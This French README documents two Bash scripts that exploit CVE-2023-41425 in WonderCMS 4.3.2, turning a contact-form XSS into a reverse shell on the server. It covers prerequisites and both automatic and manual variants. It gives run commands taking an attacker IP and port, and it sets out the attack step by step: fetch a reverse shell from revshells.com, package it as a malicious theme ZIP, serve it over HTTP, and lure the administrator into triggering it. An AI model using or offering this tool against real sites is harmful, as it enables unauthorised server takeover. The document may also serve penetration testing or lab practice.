
WonderCMS 4.3.2 Exploits XSS vers RCE
Aperçu
Ces scripts exploitent une vulnérabilité XSS (Cross-Site Scripting) dans WonderCMS 4.3.2 pour parvenir à une Exécution de Code à Distance (RCE). La charge utile XSS, lorsqu'elle est déclenchée par l'administrateur, installe automatiquement un reverse shell sur le serveur cible en exploitant un module de thème malveillant conçu à cet effet. Le reverse shell est obtenu depuis revshells.com et exécuté, donnant à l'attaquant un accès distant au serveur.
Table des matières
Prérequis
Pour exécuter l'un des scripts avec succès, les outils et conditions suivants sont nécessaires :
- Shell Bash : Les deux scripts sont écrits pour des environnements Linux utilisant le shell Bash.
- netcat (nc) : Utilisé pour écouter la connexion reverse shell.
- Python3 : Un serveur HTTP Python simple est utilisé pour héberger la charge utile XSS.
- WonderCMS 4.3.2 : La cible doit exécuter une version vulnérable de WonderCMS.
- Interaction de l'administrateur : La charge utile nécessite qu'un administrateur déclenche le XSS, ce qui entraîne l'exécution du reverse shell.
- revshells.com : La charge utile reverse shell est téléchargée dynamiquement depuis revshells.com.
Script 1 : Exploit automatique
POC
Image collée 20241010021603
Fonctionnalités
Cette version de l'exploit vérifie automatiquement la présence d'un écouteur nc actif, télécharge le reverse shell, démarre le serveur HTTP, envoie la charge utile et attend que l'administrateur déclenche le reverse shell.
- Configuration automatique du reverse shell : Télécharge un reverse shell pré-généré depuis revshells.com.
- Injection de la charge utile XSS : Injecte une charge utile XSS dans le formulaire de contact de la cible.
- Gestion du serveur HTTP : Démarre automatiquement un serveur HTTP Python pour héberger la charge utile reverse shell.
- Vérification de l'écouteur nc : S'assure que l'écouteur est en cours d'exécution avant de continuer.
- Envoi automatique de la charge utile : Envoie la charge utile automatiquement sans interaction de l'utilisateur.
Utilisation
- Assurez-vous que l'écouteur
nc est en cours d'exécution sur le port spécifié :
- Exécutez le script avec la commande suivante :
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
Exemple :
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
Workflow
- Téléchargement du reverse shell : Le script télécharge le reverse shell depuis
revshells.com.
- Modification du reverse shell : Le script reverse shell est mis à jour avec l'IP et le port de l'attaquant.
- Création de la charge utile ZIP : Un fichier ZIP contenant le reverse shell est créé.
- Création de la charge utile XSS : Une charge utile XSS qui installe le reverse shell est générée et injectée dans le formulaire de contact vulnérable.
- Démarrage automatique du serveur HTTP : Le script démarre un serveur HTTP Python pour servir la charge utile malveillante.
- Envoi automatique de la charge utile : La charge utile XSS est envoyée automatiquement à l'administrateur.
Script 2 : Exploit manuel
POC
Image collée 20241010013048
Utilisez l'exploit fourni par le script dans le champ Site web...
Image collée 20241010013218
Fonctionnalités
Cette version nécessite que l'utilisateur gère manuellement l'écouteur nc et le déclenchement de la charge utile XSS. Elle est plus adaptée aux scénarios où les processus automatiques ne sont pas souhaitables.
- Configuration manuelle du reverse shell : L'utilisateur est responsable de s'assurer que l'écouteur est en cours d'exécution.
- Déclenchement manuel du XSS : Le script fournit le lien malveillant à envoyer à l'administrateur, mais la charge utile doit être déclenchée manuellement.
- Gestion du serveur HTTP : Démarre un serveur HTTP Python pour héberger la charge utile XSS.
Utilisation
- Assurez-vous que l'écouteur
nc est en cours d'exécution sur le port spécifié :
- Exécutez le script avec la commande suivante :
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
Exemple :
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
Workflow
- Téléchargement du reverse shell : Télécharge un reverse shell depuis
revshells.com.
- Modification du reverse shell : Met à jour le reverse shell avec l'IP et le port de l'attaquant.
- Création de la charge utile ZIP : Crée un fichier ZIP contenant le reverse shell.
- Création de la charge utile XSS : Génère une charge utile XSS qui installe le reverse shell.
- Affichage du lien malveillant : Affiche le lien qui doit être envoyé à l'administrateur pour déclenchement.
- Démarrage du serveur HTTP : Démarre un serveur HTTP Python pour héberger la charge utile.
Remarques
- Interaction de l'administrateur : Les deux exploits reposent sur le fait que l'administrateur de WonderCMS déclenche la charge utile XSS en visitant la page vulnérable. Une fois déclenchée, le reverse shell est établi avec la machine de l'attaquant.
- Pare-feu/IDS/IPS : Soyez prudent lors de l'exécution de ces exploits dans des environnements protégés par des pare-feu ou des systèmes de détection d'intrusion (IDS) qui pourraient bloquer ou alerter sur une activité suspecte.
- Divulgation responsable : Si vous constatez qu'une cible est vulnérable, suivez toujours les directives éthiques et signalez la vulnérabilité aux parties appropriées.